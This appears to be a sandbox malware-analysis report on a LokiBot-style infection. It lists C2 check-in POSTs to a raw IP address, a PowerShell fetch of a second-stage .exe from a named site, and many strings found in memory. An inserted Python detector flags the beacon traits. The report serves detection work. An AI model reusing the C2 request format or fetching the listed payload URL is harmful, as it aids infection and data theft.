Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: unknown TCP traffic detected without corresponding DNS query: 185.206.215.56 (reported 50 times)
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe Code function: 17_2_00404ED4 recv, 17_2_00404ED4
Source: global traffic HTTP traffic detected: GET /wp-content/themes/index/QPR-3067.exe HTTP/1.1Host: bighoreca.nlConnection: Keep-Alive
Source: powershell.exe, 00000006.00000002.2103852429.000000001CD80000.00000002.00000001.sdmp, 12.exe, 0000000B.00000002.2187386267.0000000008780000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown DNS traffic detected: queries for: cutt.ly
Source: unknown HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0
    User-Agent: Mozilla/4.08 (Charon; Inferno)
    Host: 185.206.215.56
    Accept: */*
    Content-Type: application/octet-stream
    Content-Encoding: binary
    Content-Key: 598F9AF4
    Content-Length: 176
    Connection: close
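The check-in requests listed above share a fixed User-Agent, a raw-IP Host header with no preceding DNS query, an HTTP/1.0 POST carrying a binary octet-stream body, and a Content-Key header. The Python script below is added here as a worked example and is not part of the sandbox report: it parses raw HTTP request heads and flags those traits so the beacon can be picked out of a proxy or packet capture. The sample requests are constructed from the headers the report lists; the benign request and its www.example.com host are made up for contrast, and the assumption that Content-Key is always eight uppercase hex digits is generalized from the single value 598F9AF4 seen in this report.

```python
"""Flag LokiBot-style check-in requests by the traits visible in this report.

Added example, not part of the sandbox report. Sample requests are constructed
from the headers the report lists; nothing is sent or fetched.
"""
import ipaddress
import re

# Indicators copied from the report's HTTP traffic entries.
LOKIBOT_USER_AGENT = "Mozilla/4.08 (Charon; Inferno)"
KNOWN_C2 = {"185.206.215.56"}

# Constructed sample: the beacon as listed in the report, with the CRLF
# line breaks that extraction ran together restored.
BEACON = (
    "POST /morx/1/cgi.php HTTP/1.0\r\n"
    "User-Agent: Mozilla/4.08 (Charon; Inferno)\r\n"
    "Host: 185.206.215.56\r\n"
    "Accept: */*\r\n"
    "Content-Type: application/octet-stream\r\n"
    "Content-Encoding: binary\r\n"
    "Content-Key: 598F9AF4\r\n"
    "Content-Length: 149\r\n"
    "Connection: close\r\n"
    "\r\n"
)

# Constructed sample: the second-stage download the report shows PowerShell fetching.
STAGE2 = (
    "GET /wp-content/themes/index/QPR-3067.exe HTTP/1.1\r\n"
    "Host: bighoreca.nl\r\n"
    "Connection: Keep-Alive\r\n"
    "\r\n"
)

# Constructed benign request for contrast (hypothetical host, not from the report).
BENIGN = (
    "GET /index.html HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "\r\n"
)


def parse_request(raw):
    """Split a raw HTTP/1.x request head into (method, path, version, headers).

    Header names are lower-cased so lookups are case-insensitive.
    """
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, path, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, version, headers


def is_ip_literal(host):
    """True when the Host header is a bare IP (no DNS lookup would precede it)."""
    try:
        ipaddress.ip_address(host.split(":")[0])
        return True
    except ValueError:
        return False


def classify(raw):
    """Return the list of indicator names matched by one request, in fixed order."""
    method, path, version, h = parse_request(raw)
    host = h.get("host", "").split(":")[0]
    hits = []
    if h.get("user-agent") == LOKIBOT_USER_AGENT:
        hits.append("lokibot_user_agent")
    # Assumption: Content-Key is an 8-digit uppercase hex token, generalized
    # from the one value (598F9AF4) this report shows.
    if re.fullmatch(r"[0-9A-F]{8}", h.get("content-key", "")):
        hits.append("lokibot_content_key")
    if (method == "POST" and version == "HTTP/1.0"
            and h.get("content-type") == "application/octet-stream"
            and h.get("content-encoding") == "binary"):
        hits.append("lokibot_post_shape")
    if host in KNOWN_C2:
        hits.append("known_c2_host")
    if is_ip_literal(host):
        hits.append("host_is_ip_literal")
    if method == "GET" and path.lower().endswith(".exe"):
        hits.append("exe_download")
    return hits


def is_lokibot_beacon(raw):
    """Alert on the fixed User-Agent alone, or on Content-Key plus the POST shape,
    so a rebranded User-Agent still trips the rule."""
    hits = classify(raw)
    return "lokibot_user_agent" in hits or (
        "lokibot_content_key" in hits and "lokibot_post_shape" in hits)


if __name__ == "__main__":
    for name, req in (("beacon", BEACON), ("stage2", STAGE2), ("benign", BENIGN)):
        print(name, classify(req), is_lokibot_beacon(req))
```

The beacon matches on every check; the executable fetch from bighoreca.nl matches only the .exe download indicator, which is why a detection for this sample should pair the beacon rule with the host-is-IP-literal and exe-download signals rather than rely on the User-Agent string alone.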
Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmp String found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=
Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmp String found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraiz.crl0
Source: powershell.exe, 00000006.00000002.2102568454.0000000003688000.00000004.00000001.sdmp String found in binary or memory: http://bighoreca.nl
Source: powershell.exe, 00000006.00000002.2102568454.0000000003688000.00000004.00000001.sdmp String found in binary or memory: http://bighoreca.nl/wp-content/themes/index/QPR-3067.exe
Source: powershell.exe, 00000006.00000002.2103652511.000000001B830000.00000004.00000001.sdmp String found in binary or memory: http://ca.disig.sk/ca/crl/ca_disig.crl0
Source: powershell.exe, 00000006.00000002.2103765249.000000001B907000.00000004.00000001.sdmp String found in binary or memory: http://ca.sia.it/seccli/repository/CRL.der0J
Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmp String found in binary or memory: http://ca.sia.it/secsrv/repository/CRL.der0J
Source: powershell.exe, 00000006.00000002.2102583791.00000000036A6000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
Source: powershell.exe, 00000006.00000002.2102583791.00000000036A6000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: powershell.exe, 00000006.00000002.2102583791.00000000036A6000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: powershell.exe, 00000006.00000002.2102568454.0000000003688000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.rapidssl.com/RapidSSLTLSRSACAG1.crt0
Source: powershell.exe, 00000006.00000002.2102568454.0000000003688000.00000004.00000001.sdmp String found in binary or memory: http://cdp.rapidssl.com/RapidSSLTLSRSACAG1.crl0L
Source: powershell.exe, 00000006.00000002.2105871443.000000001D196000.00000004.00000001.sdmp String found in binary or memory: http://certificates.starfieldtech.com/repository/1604
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp String found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmp String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmp String found in binary or memory: http://cps.chambersign.org/cps/publicnotaryroot.html0
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp String found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmp String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmp String found in binary or memory: http://crl.chambersign.org/publicnotaryroot.crl0
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/TrustedCertificateServices.crl0:
Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powershell.exe, 00000006.00000002.2103729703.000000001B8CC000.00000004.00000001.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: powershell.exe, 00000006.00000002.2103702990.000000001B893000.00000004.00000001.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp String found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0
Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmp String found in binary or memory: http://crl.oces.certifikat.dk/oces.crl0
Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmp String found in binary or memory: http://crl.pki.wellsfargo.com/wsprca.crl0
Source: powershell.exe, 00000006.00000002.2103702990.000000001B893000.00000004.00000001.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: powershell.exe, 00000006.00000002.2103702990.000000001B893000.00000004.00000001.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp String found in binary or memory: http://crl.securetrust.com/SGCA.crl0
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp String found in binary or memory: http://crl.ssc.lt/root-a/cacrl.crl0
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp String found in binary or memory: http://crl.ssc.lt/root-b/cacrl.crl0
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp String found in binary or memory: http://crl.ssc.lt/root-c/cacrl.crl0
Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmp String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: powershell.exe, 00000006.00000002.2102583791.00000000036A6000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
Source: powershell.exe, 00000006.00000002.2102583791.00000000036A6000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: powershell.exe, 00000006.00000002.2102568454.0000000003688000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0c
Source: powershell.exe, 00000006.00000002.2102583791.00000000036A6000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: powershell.exe, 00000006.00000002.2102583791.00000000036A6000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
Source: powershell.exe, 00000006.00000002.2102583791.00000000036A6000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: powershell.exe, 00000006.00000002.2102583791.00000000036A6000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
Source: powershell.exe, 00000006.00000002.2103765249.000000001B907000.00000004.00000001.sdmp, powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.2103702990.000000001B893000.00000004.00000001.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/DF3C24F9BFD666761B268073FE06D
Source: powershell.exe, 00000006.00000002.2103652511.000000001B830000.00000004.00000001.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabn
Source: powershell.exe, 00000006.00000002.2098107246.000000000025D000.00000004.00000020.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enf
Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmp String found in binary or memory: http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmp String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0
Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmp String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0
Source: powershell.exe, 00000006.00000002.2103852429.000000001CD80000.00000002.00000001.sdmp, 12.exe, 0000000B.00000002.2187386267.0000000008780000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: powershell.exe, 00000006.00000002.2103852429.000000001CD80000.00000002.00000001.sdmp, 12.exe, 0000000B.00000002.2187386267.0000000008780000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: powershell.exe, 00000006.00000002.2104088848.000000001CF67000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: powershell.exe, 00000006.00000002.2104088848.000000001CF67000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000006.00000002.2103702990.000000001B893000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000006.00000002.2103702990.000000001B893000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: powershell.exe, 00000006.00000002.2103702990.000000001B893000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: powershell.exe, 00000006.00000002.2103702990.000000001B893000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exe, 00000006.00000002.2102583791.00000000036A6000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: powershell.exe, 00000006.00000002.2102568454.0000000003688000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0B
Source: powershell.exe, 00000006.00000002.2102583791.00000000036A6000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: powershell.exe, 00000006.00000002.2102583791.00000000036A6000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0H
Source: powershell.exe, 00000006.00000002.2103702990.000000001B893000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: powershell.exe, 00000006.00000002.2103729703.000000001B8CC000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.infonotary.com/responder.cgi0V
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.pki.gva.es0
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp String found in binary or memory: http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl0
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp String found in binary or memory: http://repository.infonotary.com/cps/qcps.html0$
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp String found in binary or memory: http://repository.swisssign.com/0
Source: powershell.exe, 00000006.00000002.2098764453.0000000002330000.00000002.00000001.sdmp, powershell.exe, 00000008.00000002.2135210182.0000000002380000.00000002.00000001.sdmp, powershell.exe, 00000009.00000002.2149819469.0000000002360000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: powershell.exe, 00000006.00000002.2107223409.000000001D360000.00000002.00000001.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: powershell.exe, 00000006.00000002.2104088848.000000001CF67000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000006.00000002.2102568454.0000000003688000.00000004.00000001.sdmp String found in binary or memory: http://status.rapidssl.com0
Source: powershell.exe, 00000006.00000002.2104088848.000000001CF67000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000006.00000002.2098764453.0000000002330000.00000002.00000001.sdmp, powershell.exe, 00000008.00000002.2135210182.0000000002380000.00000002.00000001.sdmp, powershell.exe, 00000009.00000002.2149819469.0000000002360000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp String found in binary or memory: http://www.a-cert.at/certificate-policy.html0
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp String found in binary or memory: http://www.a-cert.at/certificate-policy.html0;
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp String found in binary or memory: http://www.a-cert.at0E
Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmp String found in binary or memory: http://www.acabogacia.org/doc0
Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmp String found in binary or memory: http://www.acabogacia.org0
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp String found in binary or memory: http://www.ancert.com/cps0
Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmp String found in binary or memory: http://www.certicamara.com/certicamaraca.crl0
Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmp String found in binary or memory: http://www.certicamara.com/certicamaraca.crl0;
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp String found in binary or memory: http://www.certicamara.com/dpc/0Z
Source: powershell.exe, 00000006.00000002.2103652511.000000001B830000.00000004.00000001.sdmp String found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crl0
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp String found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0
Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmp String found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl0
Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmp String found in binary or memory: http://www.certifikat.dk/repository0
Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmp String found in binary or memory: http://www.certplus.com/CRL/class1.crl0
Source: powershell.exe, 00000006.00000003.2094933870.000000001D1B9000.00000004.00000001.sdmp String found in binary or memory: http://www.certplus.com/CRL/class2.crl0
Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmp String found in binary or memory: http://www.certplus.com/CRL/class3.crl0
Source: powershell.exe, 00000006.00000003.2094933870.000000001D1B9000.00000004.00000001.sdmp String found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmp String found in binary or memory: http://www.certplus.com/CRL/class3TS.crl0
Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmp String found in binary or memory: http://www.chambersign.org1
Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmp String found in binary or memory: http://www.comsign.co.il/cps0
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp String found in binary or memory: http://www.crc.bg0
Source: powershell.exe, 00000006.00000002.2103729703.000000001B8CC000.00000004.00000001.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: powershell.exe, 00000006.00000002.2102583791.00000000036A6000.00000004.00000001.sdmp String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: powershell.exe, 00000006.00000002.2103702990.000000001B893000.00000004.00000001.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmp String found in binary or memory: http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0
Source: powershell.exe, 00000006.00000002.2103652511.000000001B830000.00000004.00000001.sdmp String found in binary or memory: http://www.disig.sk/ca/crl/ca_disig.crl0
Source: powershell.exe, 00000006.00000002.2103652511.000000001B830000.00000004.00000001.sdmp String found in binary or memory: http://www.disig.sk/ca0f
Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmp String found in binary or memory: http://www.dnie.es/dpc0
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp String found in binary or memory: http://www.e-certchile.cl/html/productos/download/CPSv1.7.pdf01
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp String found in binary or memory: http://www.e-me.lv/repository0
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp String found in binary or memory: http://www.e-szigno.hu/RootCA.crl
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp String found in binary or memory: http://www.e-szigno.hu/RootCA.crt0
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp String found in binary or memory: http://www.e-szigno.hu/SZSZ/0
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp String found in binary or memory: http://www.e-trust.be/CPS/QNcerts
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp String found in binary or memory: http://www.echoworx.com/ca/root2/cps.pdf0
Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmp String found in binary or memory: http://www.entrust.net/CRL/Client1.crl0
Source: powershell.exe, 00000006.00000003.2094933870.000000001D1B9000.00000004.00000001.sdmp String found in binary or memory: http://www.entrust.net/CRL/net1.crl0
Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmp String found in binary or memory: http://www.firmaprofesional.com0
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp String found in binary or memory: http://www.globaltrust.info0
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp String found in binary or memory: http://www.globaltrust.info0=
Source: powershell.exe, 00000006.00000002.2103852429.000000001CD80000.00000002.00000001.sdmp, 12.exe, 0000000B.00000002.2187386267.0000000008780000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: RegAsm.exe String found in binary or memory: http://www.ibsensoftware.com/
Source: powershell.exe, 00000006.00000002.2104088848.000000001CF67000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp String found in binary or memory: http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
Source: powershell.exe, 00000006.00000002.2103852429.000000001CD80000.00000002.00000001.sdmp, 12.exe, 0000000B.00000002.2187386267.0000000008780000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000008.00000002.2134654234.000000000024E000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmp, powershell.exe, 00000008.00000002.2134654234.000000000024E000.00000004.00000020.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: powershell.exe, 00000006.00000002.2105871443.000000001D196000.00000004.00000001.sdmp String found in binary or memory: http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp String found in binary or memory: http://www.pki.gva.es/cps0
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp String found in binary or memory: http://www.pki.gva.es/cps0%
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp String found in binary or memory: http://www.pkioverheid.nl/policies/root-policy0
Source: powershell.exe, 00000006.00000002.2098054472.000000000020E000.00000004.00000020.sdmp, powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmp String found in binary or memory: http://www.post.trust.ie/reposit/cps.html0
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp String found in binary or memory: http://www.quovadis.bm0
Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmp String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: powershell.exe, 00000006.00000002.2106986804.000000001D1E4000.00000004.00000001.sdmp String found in binary or memory: http://www.registradores.org/scr/normativa/cp_f2.htm0
Source: powershell.exe, 00000006.00000003.2095044902.000000001D16B000.00000004.00000001.sdmp String found in binary or memory: http://www.rootca.or.kr/rca/cps.html0
Source: powershell.exe, 00000006.00000003.2094900131.000000001D1E4000.00000004.00000001.sdmp String found in binary or memory: http://www.signatur.rtr.at/current.crl0
Source: powershell.exe, 00000006.00000003.2094900131.000000001D1E4000.00000004.00000001.sdmp String found in binary or memory: http://www.signatur.rtr.at/de/directory/cps.html0
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp String found in binary or memory: http://www.sk.ee/cps/0
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp String found in binary or memory: http://www.sk.ee/juur/crl/0
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp String found in binary or memory: http://www.ssc.lt/cps03
Source: powershell.exe, 00000006.00000003.2094868628.000000001D18E000.00000004.00000001.sdmp String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crl
